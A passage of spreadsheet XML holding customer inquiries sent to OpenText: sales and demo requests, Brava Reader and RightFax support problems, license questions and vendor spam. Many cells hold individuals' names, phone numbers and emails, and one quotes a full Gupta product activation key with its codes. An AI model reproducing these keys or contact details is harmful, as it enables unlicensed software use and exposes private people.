Pourriez-vous me confirmer que vous avez des solutions pour répondre à ce besoin ?_x000D_
Pourriez-vous me confirmer que vous répondez à ce type de solution en Suisse ?_x000D_
Pourriez-vous me transmettre des informations ?_x000D_
_x000D_
La procédure sera la suivante :_x000D_
1.	En mai consultation pour sélectionner environ 5 fournisseurs_x000D_
2.	En juin publication de l’appel d’offre auprès de 5 fournisseurs_x000D_
_x000D_
Je vous remercie de vos informations._x000D_
_x000D_
Avec mes meilleures salutations._x000D_
_x000D_
Frédéric Matthey_x000D_
Directeur _x000D_
_x000D_
M&amp;H Atlon Services Sàrl_x000D_
📧 frederic.matthey@atlon.ch _x000D_
Chemin des Sauges 4, 2525 Le Landeron, Suisse_x000D_
📱 +41 (0) 79 207 95 32_x000D_
🏠 www.atlon.ch _x000D_
🏠 www.atlonpmanager.ch _x000D_
🏠 www.atlonxpense.ch _x000D_
🏠 www.atlonmintervention.ch _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Product activation key is not worked. I move Gupta app to new computer._x000D_
Dear Jonathan Chu,_x000D_
_x000D_
Thank you for your Gupta Team Developer registration request for the following Product Media Code (PMC) and Product Activation Code (PAC): _x000D_
_x000D_
Product Media Code: E0EA1B19-EBB79167-455F1327-6DBBABF5_x000D_
Product Activation Code: B6A561E8-962B6760-313DFCAC-BAF7281B_x000D_
_x000D_
Product Name: Team Developer_x000D_
Product Version: 5.2.00_x000D_
_x000D_
Please use the following Product Activation Key (PAK) to activate your Gupta software:_x000D_
Product Activation Key: 96EF46FF70A51172F3505340B4D0E06E_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je suis Sandra LOULOU de Alpha engineering France._x000D_
Merci de m'envoyer l'e-mail de "OPEN TEXT Paris" pour discuter des possibilités de collaboration ._x000D_
_x000D_
Cordialement,_x000D_
Sandra LOULOU</t>
  </si>
  <si>
    <t xml:space="preserve">I need to our account contact.  I have no contact information for Open Text and I have a question.  We issued a 3 year PO in 2016 for our licenses (expires 2019) and we pay annually; yet, when we check out licenses via your portal, it shows a 2017 expiration date.  I need some clarity and understanding.  </t>
  </si>
  <si>
    <t>I'm looking to access a client's po and need an invitation code to enter the system. Please confirm how I may obtain the code.</t>
  </si>
  <si>
    <t>hello ,is there any engineer can help us to resolve some issues about Brava? which come from our customer.</t>
  </si>
  <si>
    <t>I am interesting in ECM  - OpenText content server estimate price. _x000D_
I prefer to contact  by  email_x000D_
Than you.</t>
  </si>
  <si>
    <t>Please consider this mail as important and require your acknowledgement. Currently, we are organizing 3rd International Conference on Coastal Zones during October 30-31, 2017 Toronto, Canada. We sincerely intended to convey our conference Agenda in your Organization. If possible, provide the contact information so that we will send the conference agenda with program details and make further follow up.</t>
  </si>
  <si>
    <t>Would you please be able to provide a link to a test trial environment for OpenText Media Management Cloud Edition ?_x000D_
We are looking at various solutions and comparing functionality._x000D_
Thank you for your help._x000D_
Regards</t>
  </si>
  <si>
    <t>Hello ,_x000D_
 Good Morning!_x000D_
     we are available to provide free lancing support on OpenText Testing(manual), SAP ERP ILM/Data Archiving, Content Server and OpenText Archiving along with EIM’s (VIM , EFM, TRM, xECM &amp; Document presentment) at a competitive price._x000D_
   _x000D_
Please let me know if you are looking for one._x000D_
 _x000D_
Services offered: Analysis. Implementations, Integration, Training, Customizations, Upgrades, outsourcing _x000D_
Thanks,_x000D_
Manaswini</t>
  </si>
  <si>
    <t>Request of quota for Brava desktop and Brava Reader.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Bill smith and I work with Tree Business Services as lead generation executives. I am writing you to check if you have any interest in acquiring email databases for procurement titles? We maintain contacts of Chief Procurement Officers, Director Procurement, Head of Direct/Indirect Procurement, Head of Market Intelligence, Procurement officer, Supply chain manager, Supplier relationship manager, Contract manager and E-procurement manager etc.. _x000D_
_x000D_
Data Fields: First Name, Last Name, Company Name, Job Title, Mailing address, State, City, Zip Code, Phone, Fax, Website, Email addresses, Industry. _x000D_
_x000D_
The list will be provided for your unlimited usage _x000D_
_x000D_
Let me know if you need any additional information on list purchase?_x000D_
_x000D_
Regards,_x000D_
Bill Smith _x000D_
Business Development Executive_x000D_
bill@treebusinessolutions.com_x000D_
www.treebusinessolutions.com_x000D_
</t>
  </si>
  <si>
    <t>I have to downloaded latest version of Brava Reader twice and installed. But after installing when I am trying to open any document, it shows a message "An update for Brava! Reader will be required within 4 days._x000D_
Please contact your supplier for an update."_x000D_
What to do now? Should I stop using Brava Reader and shift back to Acrobat reader?</t>
  </si>
  <si>
    <t>Can not download a free Brava!Reader copy due to network error._x000D_
Transmission seems very slow.  Please help correct the situation.</t>
  </si>
  <si>
    <t>RFP due 20th April 2017. Please contact asap</t>
  </si>
  <si>
    <t>I generated pdf file from Aveva Marine 2D software. Virtual Adobe PDF software printed electric pdf file. I usually use Adobe acrobat/Reader and Brava Reader when I open pdf file. I found problems for text display in a view. Acrobat showed it as same as original cad file but Brava Reader showed weaken thickness and light color in text against original file. Font is Romans and True Type Font from windows. Could you check it out and give feedback to me? I would like to show captured image for your easy understand but I couldn't find attached it.</t>
  </si>
  <si>
    <t>The SQLBase reference site [ http://support.guptatechnologies.com/Docs/SQLBase/Books/sqllang/index.htm ] is no longer functioning as a result of server+security configuration. If the reconfiguration was unintentional, please fix it. If the reconfiguration was intentional, please indicate where the information that used to be supplied at that address may be obtained. Thank you.</t>
  </si>
  <si>
    <t>New release of Brava Reader does not work. Gives you an error._x000D_
Brava Reader 16.2 Install Shield Wizard_x000D_
Windows versions prior to Windows 10 require Windows Update KB2999226 for Universal CRT before using this product. Setup will abort._x000D_
_x000D_
Downloaded that update but it says update is not applicable to your computer. _x000D_
Our Windows 7 computer is up to date. It might be a problem with the newly released Brava Reader version with Windows 7. Tried it with a Windows 10 computer and installer works. No problem on Windows 10.</t>
  </si>
  <si>
    <t>Need a sales contact to review fit for our marketing project</t>
  </si>
  <si>
    <t>I have exceed 14(64) installed on windows 10. But I always get error "Fatal error: Cannot open default font." when trying to run Exceed._x000D_
Is this version compatible to Windows 10?_x000D_
THanks,</t>
  </si>
  <si>
    <t>Need to discuss upgrading Brava Reader</t>
  </si>
  <si>
    <t>Scoping an ECM solution for the company.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for any type of knowledge based webinar or  documentation on RightFax Utility for application support, troubleshooting. </t>
  </si>
  <si>
    <t>product research for a content management system</t>
  </si>
  <si>
    <t>This is a private residential number on the national do not call listhe.  Stop faxing me!</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in sophisticated conflict checking system that can juggle lots of different types of contacts in transactional work. </t>
  </si>
  <si>
    <t xml:space="preserve">We are an Israeli VAD who bought from ImageX USA two QuickScan Pro production level 2 licenses, to be used with Kodak i5600 scanners. One license was bought in May 2014 and one in late July 2014._x000D_
We have a problem with the license which was first installed in Aug. 2014._x000D_
This level 2 license worked properly since Aug. 2014. _x000D_
During a re-installation last week, when we selected the i5600 scanner, a message saying (not the exact wording)_x000D_
    “QSP Level 4 is required while yours is Level 2” was received._x000D_
Please advise how to overcome this problem, first encountered after 3.5 years._x000D_
Please confirm the license we have is valid._x000D_
I appreciate very much your help._x000D_
</t>
  </si>
  <si>
    <t>How do I use ACtuate Rest Data Source in report to get data from Rest API.</t>
  </si>
  <si>
    <t>Our common client wants RightFax integrated into our applications. We would like to a thirdparty agreement so that we can verify the integration and also support any future updates.</t>
  </si>
  <si>
    <t>Attn: Human Resources Dept._x000D_
My name is Shelby Lobb and I submitted an application for "Software Development Intern" on March 24, 2017. I am sending this message to inquire about the status of this position and my application for the same. _x000D_
Thank you in advance for your response. _x000D_
-Shelby Lobb</t>
  </si>
  <si>
    <t xml:space="preserve">My organization is interested in implementing an ECM solution and would like to set up a demo of OpenText to see if it's a fit.  </t>
  </si>
  <si>
    <t>I am trying to locate our new account executive to help with extending our agreement. We were previously working wth John Knott and received a kicked back email saying that he is no longer at Open Text. We have been struggling to figure out what to do with executing a new change order since late JANUARY. We were told that it needed to be updated to Open Text paper and then everything fizzeled out. _x000D_
_x000D_
Open Text Order #: SUS08474424 (Beth Israel Medical Ctr.) - PO # 1150026421 - Project PS-0091947.</t>
  </si>
  <si>
    <t>We hope to be become your reseller.</t>
  </si>
  <si>
    <t>Received the Installation and Update Guide for version TLi 6.4.1 and I need to request for the CD's for this installation. Can you please assist with this?</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
Good Day! We are from CITI Application Readiness Team, need your assistance in order to gather info about application compatibility and support for Windows 10. We would like to know whether the below application is compatible and supported for Win 10 (64 Bit). If you haven’t tested , could you please provide us a tentative date of when we can reach you . _x000D_
_x000D_
Applications Name : Citi Execute360 Client v10.0_x000D_
_x000D_
If the above version is not compatible with Windows 10. Then do we have any higher version/replacement which compatible with Windows 10._x000D_
_x000D_
Thanks in Advance_x000D_
Rajeshwari Ramteke_x000D_
Citigroup Inc._x000D_
+91 22 3930 3351</t>
  </si>
  <si>
    <t>bonjour,_x000D_
Nous somme une banque algérienne, nous souhaitons organiser une formation sur SteamServe dans nos locaux ici a Alger, pouvons nous envoyer une offre de formation sur :_x000D_
1 - Stream. Serve EDP: Install and administration._x000D_
 2 - StreamServe EDP: Development and Integration._x000D_
_x000D_
merci.</t>
  </si>
  <si>
    <t>I am overseeing our firm's transition to electronic legal records and I would like more information on your products.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello new neighbour!_x000D_
_x000D_
I am writing from Notes Coffee Roasters &amp; Wine Bar._x000D_
_x000D_
We have just opened around the corner from your London office, in Angel Court EC2R 7HJ._x000D_
_x000D_
Could you put me in touch with someone there? We have some special offers for them..._x000D_
_x000D_
To celebrate the opening we would like to invite you all to enjoy a coffee on us on Tuesday 18th or Wednesday 19th April._x000D_
_x000D_
From 5pm onward we are also offering a complimentary beer, glass of wine or Prosecco._x000D_
_x000D_
It is one free coffee and one free alcoholic drink per person._x000D_
_x000D_
Please do pass this offer onto colleagues and friends who work locally._x000D_
_x000D_
We are really looking forward to seeing you at Notes soon!_x000D_
Best,_x000D_
Rob_x000D_
_x000D_
PS - we are also open tonight for a soft opening, but no freebies until next week!_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am trying to obtain a statement of account showing any open posts that Open Text AB c/o may have towards Interoute Managed Services Sweden AB._x000D_
This is for our internal audit._x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
 _x000D_
 _x000D_
Please offer to purchase the software Brava Desktop(for CAD): 25 licenses witch maintenance (first year)._x000D_
 _x000D_
 _x000D_
Jarosław Kulok_x000D_
</t>
  </si>
  <si>
    <t>What is the latest version of Brava! Reader and how can I download it as the version I have been using has expired?</t>
  </si>
  <si>
    <t>Need to know if there are any learning opportunities regarding the Document Pipeline. I cannot find any documentation on this tool and how it is used.</t>
  </si>
  <si>
    <t xml:space="preserve">Aufgrund des Erwerbs der Innomotive Systems Hainichen GmbH sollten wir unseres IT-Systems sowie Archiv-System aus vorherige Muttergesellschaft übernehmen. Opentext ist der aktuelle Dienstleister für das Archiv-System. </t>
  </si>
  <si>
    <t>Brava reader I download is only for windows 10. Can you kindly provide window 7 version Brava reader download URL?</t>
  </si>
  <si>
    <t>I would like to make an appointment with the Partner account manager in The Netherlands to check if OpenText and Comparex can intense their relationship and to be informed about the partner program of OpenText._x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>open case for Documentum issue</t>
  </si>
  <si>
    <t>We need exceed on demand Client 13.8.6.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Sales Team_x000D_
I am from Infosys Life sciences vertical . We are exploring a possibility of using Captiva product for one of our implementation engagement (web based application using Java) for our client that requires OCR capabilities to read the content from a scanned pdf document._x000D_
Please find below the details of the application we intend to build :_x000D_
•	Type of Application : Web Application, using Java technology, with latest frameworks_x000D_
•	Number of Users : 200 - 500_x000D_
•	Number of Active / concurrent users : 50_x000D_
•	Brief OCR Functionality requirement :_x000D_
1.	Scanned document in PDF format from user’s local machine will be uploaded to a documentum system_x000D_
2.	While uploading, some of the content need to be read from scanned image in the pdf document and accordingly few business rules will be applied before it gets uploaded._x000D_
3.	There will be multiple templates of such documents which will need to be maintained and processed for OCR capabilities._x000D_
4.	These documents will need to be in different languages (especially English, Japanese, Chinese and other EU languages….and may be more)_x000D_
5.	There is no further intelligence needed as part of the OCR Requirement._x000D_
It would really  help us finalize the OCR product(which will be procured by our client) if we can get the details around licensing of the products that fits well in the requirement stack.  _x000D_
An early response will be much appreciated!_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Gaurav Agrawal_x000D_
Infosys Ltd._x000D_
Voip: +91.4044294696_x000D_
Work:+91.40.67060184_x000D_
Cell:  +91-9866014965_x000D_
</t>
  </si>
  <si>
    <t>I want to download the software, but I am in a cycle to request a confirmation email._x000D_
We have a end user number. The end user  nr is EU0036982_x000D_
_x000D_
Best regards Karl Vogelsberger</t>
  </si>
  <si>
    <t xml:space="preserve">Our company is searching for a Part 11 compliant document management system and an eTMF provider.  We would like a demo of OpenText ASAP. </t>
  </si>
  <si>
    <t>I downloaded the eval version of Brava! desktop and installed it. I also tried to register to access the login center twice. Both times I received the confirmation email and clicked on the link. Both times it said the confirmation was successful. Yet when I try to access the Knowledge Center, it keeps telling me my access hasn't been confirmed.</t>
  </si>
  <si>
    <t>We are working in a pursuit that requires fax integration with Hyland OnBase and Salesforce. Wanted to understand what kind Hardware/Software licensing is required as well as other technical requirements so that we can understand the implementation impact.</t>
  </si>
  <si>
    <t>Hi _x000D_
I would like to inquire if there exists any reseller program or partnering opportunity with eDocs Document Management Software._x000D_
_x000D_
Regards_x000D_
Pye</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Can you help confirm if SAPUTO Inc has an active customer support contract._x000D_
_x000D_
regards,_x000D_
Michael</t>
  </si>
  <si>
    <t>Hi, _x000D_
We have eDOCS version 6. How do we find how many licenses we have? Is that something we can check ourselves? _x000D_
Regards,_x000D_
Georgia</t>
  </si>
  <si>
    <t>Hello, I am Jaeyoung Kim from Samsung Electronics Enterprise Business Team of Visual Display department. I am currently working in a solution planning team, and we are considering incorporating Digital Asset Management system in our solution. _x000D_
_x000D_
Regarding this, we would like to make a time to listen from your company about Digital Asset Management system, and find some rooms for collaboration. _x000D_
_x000D_
I will wait for your response. _x000D_
_x000D_
Best, _x000D_
Jaeyoung</t>
  </si>
  <si>
    <t>I can not get Brava Reader to open.  I just downloaded it.  Do I need a license #?</t>
  </si>
  <si>
    <t>Firstclass demo or test server request</t>
  </si>
  <si>
    <t>OCR desktop applications of utility bill data extraction.</t>
  </si>
  <si>
    <t>I just started selling Cosmetic products.  I use GXS Catalogue for my garment to input our UPC# so our customer can download.  I just need to know if i need to set up the same thing for Cosmetic or is it a different GXS catalogue for cosmetic products</t>
  </si>
  <si>
    <t>SUID-46920-12279_x000D_
The Rightfax 10.5.1.6071 in our production environment, has been found stop purging the image since year 2015. The hard drive with Rightfax installed will be soon running out space. As this feature always ran automatically in the past. We need immediate help to identify the problem before the hard drive space runs out. As the legal requirement from the business is to keep all records for 7 years, so we cannot delete history fax records.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to have your support for the Recycling 2017 conference which is going to be held on November 6-8 at Las Vegas, Nevada, USA. We would like to have your support like exhibitor or speaker or delegate.  Please let us know your interest. Kindly check out the provided link of the conference: http://recycling.conferenceseries.com/america/ _x000D_
_x000D_
For any further information or appeal, please contact me._x000D_
</t>
  </si>
  <si>
    <t>Update status on: OTCS Ticket 2583675 Application scan results for new Alchemy Server.  Needs review by OpenText._x000D_
o	SUID # is 64889-12176</t>
  </si>
  <si>
    <t>Boa Tarde!!_x000D_
Preciso algumas informações_x000D_
Caso comprarmos o programa ele é vitalicio?? Vocês fornecem um cd pra instalação ou como funciona??E valores para 1 maquina e se comprar para mais uma existe negociação??_x000D_
Fico no aguardo_x000D_
Obrigado.</t>
  </si>
  <si>
    <t>Hello,_x000D_
     I would like to get pricing on a licensed version of Reader, I have I believe 3 dozen users who like to use the product.  If we were able to find pricing that I could convince my departments to approve of that number would climb quite a bit with our other locations.  Thank you for your help.</t>
  </si>
  <si>
    <t>Hello, we currently use Brava Reader to access certain files in our Probate system.  We have been notified that there is 11 more days of the trial.  This software has been free previously.  Is Brava Reader still a free program to use?  If not then what is the version that we would need to purchase?</t>
  </si>
  <si>
    <t>I wan to understand what courses I should take to learn OpenText basics, administration and business intelligence.  I would also like to know which of these courses are suitable for elearning and virtual classrom environments.</t>
  </si>
  <si>
    <t>Does Redact-It version: _x000D_
Build: 2.3.0.71_x000D_
Package: 2.3.0.211_x000D_
work with Windows 10?</t>
  </si>
  <si>
    <t>We are in the processing of divesting one of our business units and would like to transfer some Brava Reader licenses to them.  I would like to know if we are able to transfer them and what we need to do if we are able to transfer them.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Hi,_x000D_
_x000D_
We provide ready to use email lists of prospects. Would you be interested in acquiring ready to use email lists for your lead generation purpose? Please let me know your target audience and few free samples would be sent for your review._x000D_
_x000D_
Your quick note will be greatly appreciated._x000D_
_x000D_
Regards,_x000D_
John _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Did not receive download link for Brava Reader</t>
  </si>
  <si>
    <t>Our license for Liquid Office has expired and we need to renew it. The problem is that the last time we renewed our license, it was with Autonomy who no longer owns Liquid Office. Can you help renew our license? Our Serial number is 22337</t>
  </si>
  <si>
    <t>Akron General Medical Center, Akron General Health System &amp; Akron General brands should all be updated to Cleveland Clinic Akron General._x000D_
_x000D_
Also, please modify our support account to be sinneta@ccf.org instead of angela.sinnett@akrongeneral.org_x000D_
_x000D_
Please call me if you need any additional information to modify our support account._x000D_
_x000D_
Thanks!_x000D_
Angela Sinnett_x000D_
330-344-6016_x000D_
sinneta@ccf.org</t>
  </si>
  <si>
    <t>Hello! I am emailing you today to introduce myself as the new Editor-in-Chief of Pharmaleaders.com. I would like to invite you to forward a press release from your company whenever you have one. Please click here to view our media kit which will give you an idea of our publication and our readership. I look forward to hopefully working with you in the future._x000D_
Best, _x000D_
Kim</t>
  </si>
  <si>
    <t>MediaBin online training_x000D_
_x000D_
can you please, provide information._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Many years ago we built a docuement management application using Pixtools and ISIS.  We'd like to move this application to the web and found the Captive Cloud toolkit that may meet our needs.  We'd like to speak to someone about pricing and pre-sales support to prove this offering could/does meet our needs.  Can someone please call me to discuss.  Thanks</t>
  </si>
  <si>
    <t>We are looking to purchase a license for the Brava Drawing Software</t>
  </si>
  <si>
    <t>I am interested in learning more about secure platform products where we can share our investors data with them.</t>
  </si>
  <si>
    <t xml:space="preserve">The world of business is influenced by the ethics and understanding of the role of business around the globe. To better understand this and facilitating our teaching of tomorrow’s workers, we have initiated a study looking to the ethics utilized within business. We would like to invite you to participate in our multi-country study of the importance of business ethics and etiquette across a business relationship lifecycle. Your participation in this study is much appreciated. The survey will take approximately 15-20 minutes of your time._x000D_
_x000D_
I would appreciate your forwarding this to others in your institution such that we gain as broad of a perspective as possible concerning business ethics in Canada._x000D_
 _x000D_
Please click here to start the survey: http://vuw.qualtrics.com/jfe/form/SV_3W2EWv6osYQfHmZ_x000D_
 _x000D_
 _x000D_
With Warmest Regards_x000D_
Ina Freeman, Ph.D._x000D_
 _x000D_
On behalf of Kim Fam, Ph.D._x000D_
__________________________________________x000D_
Kim-Shyan Fam, PhD, FCIM, DPhil (honoris causa)_x000D_
Professor of Marketing at VUW_x000D_
Changbai Scholar at JUFE_x000D_
Founding Director of MAGScholar®_x000D_
 _x000D_
School of Marketing &amp; International Business_x000D_
Victoria University of Wellington_x000D_
11/F Rutherford House_x000D_
23 Lambton Quay, Wellington, 6011_x000D_
New Zealand_x000D_
Tel: + 64 4 463 6459_x000D_
Fax: + 64 4 463 5231_x000D_
Mob: 027 563 6459_x000D_
Email: kim.fam@vuw.ac.nz_x000D_
Skype: kim.fam_x000D_
</t>
  </si>
  <si>
    <t>We are upgrading to Windows 10 x64 and Office 2016 x64 and would like to know what Rightfax client will work for us.  Thank you.</t>
  </si>
  <si>
    <t>We are interested in implementing the RightFax Universal SMTP Connector for a Canon ir-ADV 4035 MFP</t>
  </si>
  <si>
    <t>Hi,_x000D_
I want to contact a french reseller. _x000D_
I am looking for OpenText StreamServe._x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am trying to contact someone at OpenText about upcoming changes to Dunham's Sports mapping. </t>
  </si>
  <si>
    <t xml:space="preserve">Need  sample of rpt design to convert our jasper reports to birt. And what is the difference between license version of birt and free version. could you support provide below reports for our poc._x000D_
_x000D_
	Installation BIRT Eclipse_x000D_
	BIRT Architecture_x000D_
	Creating datasource_x000D_
	Creating dataset_x000D_
	Creating Filter,Map,Sorting_x000D_
	Creating Parameter_x000D_
	Creating Dynamic Parameter and Filter_x000D_
	Cascading Parameter_x000D_
	Creating Join and Union Dataset_x000D_
	Creating Scriptlet_x000D_
	Creating Page variable and Localization_x000D_
	Style_x000D_
	Crosstab _x000D_
	Chart_x000D_
	Sub reports and Parallel reports_x000D_
	Event Handler_x000D_
	Installing BIRT runtime builder_x000D_
	Configuring BIRT report with BIRT runtime viewer_x000D_
	Sample example of BIRT deployment in web application_x000D_
	Library_x000D_
	Drill Down report_x000D_
	Template_x000D_
</t>
  </si>
  <si>
    <t>training requirement on Cordys Administration</t>
  </si>
  <si>
    <t>Bonjour, nous avons un besoin de sous-traitance informatique pour environ 900 employées en France et éventuellement aux autres pays européens. Les missions consistent en prestation des services du support Business Process&amp;IT fournis par des ingéneiurs résidents. _x000D_
N'hésitez pas à me contacter pour de plus amples informations.</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Tim Gale and I own &amp; operate a local bike shop called velofix (www.velofix.com).  We are part of North America's largest fleet of Mobile Bike Shops.  We packed a full service bike shop into a custom built Mercedes Benz sprinter van so we can bring all the tools, parts, expertise and skills right to your home, office, school or event.  _x000D_
_x000D_
I would love to arrange a day to have our van come out to OpenText and tune-up bikes.  Your employees can bring their bikes to work and get a tune-up done on site while they work!  We have both employee and company paid options.  We are very flexible and would love to tailor a service to your needs and budget.  It's a really great way to get your bikes ready for spring and promote a healthy work place._x000D_
_x000D_
Let me know if this is something that you're interested in and we can arrange a time to talk._x000D_
_x000D_
Sincerely,_x000D_
Tim Gale | Franchise Owner &amp; Operator_x000D_
C: 519-781-8356_x000D_
_x000D_
velofix - WR &amp; Guelph_x000D_
1-855-VELO FIX | www.velofix.com </t>
  </si>
  <si>
    <t>Checking solution cost, cloud vs on premise options.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Last week my office downloaded the newest version of Brava! Reader, but the download was the same version already installed on our machines.  Is there a contact person I can reach out to, to get a link for the updated version?  My installed version expires in 6 days.  Thank You</t>
  </si>
  <si>
    <t>I Need Access to Knowledge Base. It does not work.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Would you interested in Salesforce Technology Customers from UK.?_x000D_
_x000D_
We have  22,670  Tele verified leads of   Salesforce  Technology  Customers from UK.(Newest 2017)._x000D_
_x000D_
Records Includes: Contact Person name, Title, company Name, URL, Specific email address, Phone number, Fax Number, Direct mail details and so on._x000D_
_x000D_
Kindly revert with your requirement for a test data and additional information._x000D_
_x000D_
We have also available Tele verified leads of  Salesforce CRM, Salesforce Desk, Salesforce Force.com, Salesforce Radian6,Salesforce Marketing Cloud, Salesforce Heroku, Salesforce Service Cloud, Technology Customers from UK._x000D_
_x000D_
ALL PREMIUM QUALITY LEADS (Newest 2017)._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Cheri Hubbard_x000D_
CMO_x000D_
lead-pool_x000D_
Email: cheri.hubbard@lead-pool.com_x000D_
Phone: 302 351-3195_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam, _x000D_
_x000D_
I’m Sushanta, from Sahoowebsolutions, an India based SEO Company. I would like to disclose some facts about your website. I hope you won’t mind spending only 2-3 minutes to have a look at the following lines:_x000D_
_x000D_
. I found your website listed under the Google sponsored listing for which you pay a significant amount. But sometimes this sponsored listing or PPC creates bidding wars. You pay every time somebody clicks on it. It certainly hurts!  Why not try organic SEO for your website and boost its growth?_x000D_
_x000D_
. In PPC, you may get the sales but only after paying a certain amount every time and if you stop paying, then the sales will be vanished soon. But in SEO, leads and sales won't vanish even if you stop paying. Hence, make sure you enjoy this long-term benefit unlike PPC._x000D_
_x000D_
. 90% of users prefer natural results over the sponsored ones because these results are more relevant and valuable. So just imagine how many  valuable customers you are losing by not focusing on organic search results._x000D_
_x000D_
By investing a few months in SEO, you can see drastic changes in your website internally and externally. We will show you improvements in your keyword rankings, link popularity, organic traffic and many more._x000D_
_x000D_
When visitors search for your desired keywords, do you want to be seen on the first page of Google, Yahoo and Bing or you are happy with your current position and sales? You can see the more powerful sites over the  Internet are having more backlinks. A well planned and executed SEO can make these things happen._x000D_
_x000D_
After reviewing you website www.opentext.com, I noticed some major on-page and off-page issues need to be fixed soon. For more information about your site errors, please respond to my email._x000D_
_x000D_
Soon after receiving your email, I would be glad to provide you with the detailed analysis report of your website (free of cost) together with our company profile, and client testimonials. If you want, I can call you to discuss more about the same.</t>
  </si>
  <si>
    <t>Är intresserad av en budgetoffert. Dokumenthantering som ska ersätta gemensam filarea. Ring eller maila för utförligare information.</t>
  </si>
  <si>
    <t xml:space="preserve">Our BravaReader application shows it will expire from 19/04/17 however the version we can download is the same version. Can you advise how we can update our free BravaReader application?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BRAVA Reader (Image only): what is the difference between TX for 49$ and TXL for 115$ ?</t>
  </si>
  <si>
    <t>Please advise the procedure to follow to a CMS website. I am exploring your services. The head office and most country offices are using your services. The website is https://www.bbraun.com</t>
  </si>
  <si>
    <t xml:space="preserve">I am working in Birt for last one year and I have done the conncetion profiling in Windows and its works fine. When the same Technic is not working in DB2 and Websphere </t>
  </si>
  <si>
    <t>Dear contact partner,_x000D_
_x000D_
I am contacting you regarding an outstanding invoice (9002020691) due to be settled._x000D_
I tried to contact the local office in Switzerland which referred me to the HQ in CDN._x000D_
_x000D_
regards</t>
  </si>
  <si>
    <t>Looking for a construction/ Engineering Oriented Document management system</t>
  </si>
  <si>
    <t>Need a RightFax solution for 200 channel</t>
  </si>
  <si>
    <t>Since days, I'm not able to sign into Knowlegecenter. No login screen appear.</t>
  </si>
  <si>
    <t>Looking for fax solution for small scale company</t>
  </si>
  <si>
    <t xml:space="preserve">I am wanting to know how to increase the size of the viewing screen. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
We’re in the process of scoping the implementation of a DAM here at Air New Zealand, and whilst we have developed relatively robust requirements, we were hoping to find out a little more about DAM products prior to testing the market (and indeed for our own internal knowledge given DAM’s still seem to be in their infancy)._x000D_
_x000D_
One of the reference documents which has been brought to our attention is the Forrester benchmarking report published towards the end of last year, in which the OpenText Media Management and Media Bin products scored highly. To this end, and to assist with our understanding of DAM’s in general, I was hoping you may be able to provide return e-mail information on the following:_x000D_
_x000D_
•	OpenText DAM product specs and options;_x000D_
•	Do you have a presence in the NZ market, and have you implemented a DAM solution here in NZ (or Australia for that matter)?;_x000D_
•	3rd party implementation and integration – does OpenText use a third party in any way with DAM solutions?_x000D_
_x000D_
Many thanks in advance - it may be that once we have more information to hand we’ll arrange for a demo given the above questions are quite broad, however this will be confirmed down the track._x000D_
_x000D_
Kind Regards_x000D_
Cameron Taylor_x000D_
Air NZ Procurement_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing on OpenText for IBM Solutions.  </t>
  </si>
  <si>
    <t>edocs demo request</t>
  </si>
  <si>
    <t>The Free Brava Reader download isn't updated.  I downloaded it this morning and it still package 16.0.2.13 and shows an expiration date of 4/19/17.  Could you please send me the most current version that will expire in July? Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
Currently i'm working in NXP as digital asset manager and i need to know if you can provide additional online training on MediaBin._x000D_
_x000D_
Thanks for your comments._x000D_
_x000D_
Regards </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello:  I am writing to request the name of the individual and their address at your company who would receive a Request for Proposal from our Campus.  We are at the University of Illinois at Urbana-Champaign and are seeking an outsourced secure faxing solution.  We are currently using RightFax but it is not a secure system and is not HIPPA, PCI or FERPA compliant.  _x000D_
_x000D_
The Purchasing Department at the U of I has our Request for Proposal and they are responsible for sending out copies of the bid proposal.  Your company was recommended to us by the University of Missouri and after reading your website I would like to list your company on the list we provide our Purchasing Department.  I ask that someone send me the person’s name and direct address who should get this document.  It will not be mailed for a few months……as you probably know these procedures can take some time._x000D_
_x000D_
Thank you in advance for your help._x000D_
_x000D_
Sincerely, EllenSue Cameron  _x000D_
IT Manager and Administrative Coordinator_x000D_
University of Illinois at Urbana-Champaign_x000D_
ellensue@illinois.edu_x000D_
217.244.1318_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interested in finding out more about your CCM offering.</t>
  </si>
  <si>
    <t>I'm contacting you on behalf of a U.S. Department of Defense agency that is looking to procure a Knowledge Management capability and I am conducting market research for the agency. I'd like to get an email address where I can send some questions that we have. Can you please provide an email address for your federal sales?</t>
  </si>
  <si>
    <t xml:space="preserve">Previously worked with Livelink. We need a system for document control and storage. Would like to discuss._x000D_
</t>
  </si>
  <si>
    <t>Good Morning Guys,_x000D_
_x000D_
I just have a quick question about some of the blogs that run on the OpenText website. Is there someone I can reach out to that helps administrate that?_x000D_
_x000D_
Kind Regards,_x000D_
Peter Darmon</t>
  </si>
  <si>
